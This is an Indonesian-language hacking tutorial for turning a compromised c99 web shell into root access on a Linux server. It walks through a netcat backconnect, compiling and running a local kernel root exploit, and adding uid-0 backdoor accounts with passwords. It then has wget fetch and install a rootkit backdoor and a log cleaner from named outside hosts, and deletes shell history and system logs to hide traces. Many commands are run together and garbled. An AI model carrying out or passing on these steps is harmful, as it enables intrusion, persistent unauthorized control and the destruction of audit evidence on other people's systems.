Assalamualaikum...tutorial kali saya akan membahasa cara root sebuah shell, sebenarnya sih cara root shell sih gampang nah berikut caranya :
Pertama Masuk ke c99 kita siapin nc dlo di kompi nah hbs tuh kita backconnect kalo udh berhasil maka akan keluar shell di cmd windows atau linux kita [ kalau kita udh punya akses shell tanpa melalui web lansung aja ke tahap 2 ]setelah ituh kita cukup menanam local root exploitkemudian kita cukup melakukan perintah
gcc rooter file-localroot
misalnya nama local root exploit kita kernel.2.6.35
gcc rooter kernel.2.6.35
habis perintah itu kita cukup memasukan perintah
./rooter
klo udh klo ada respone kita ketik di cmd window kita tadi whoiam atau idmaka akan keluar
uid=0(root) gid=0(root) groups=50(ftp)
selanjutnya kita :
Add login akses root anda----------------------------------------------------------------
1. Cara I
(bukan utk redhat 7.2)/usr/sbin/useradd rampok -u 0 -d /
passwd -d rampokpasswd rampok
su rampok
2. Cara II
kalo mau dapet acces root ketik :
/usr/sbin/useradd crit -u 0 g- 0 -d /etc/critabis itu ketik lagipasswd crit
wuasu666
Kemudian Add User untuk login shell anda
/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/htmlpasswd htmlfuck666 2X
---> Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan
wget http://www.utay-doyan.cc/shv4.tar.gztar -zxvf shv4.tar.gzcd shv4./setup pass yang dimau port yang dimau
contoh : --> ./setup wuasu 7000cd /
wget http://cyberborneo.b0x.com/cleaner.tgztar -zxvf cleaner.tgzcd cleaner./install
Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
-*------*-
---> Hapus jejak ngeroot anda ketik perintah berikut:
rm -f /.bash_history /root/.bash_history /var/log/messagesln -s /devoryln -s /dev/null /root/.bash_historytouch /var/log/messageschmod 600 /var/log/messagesrm -rf /var/log/lastlogcat > /var/log/lastlogctrl d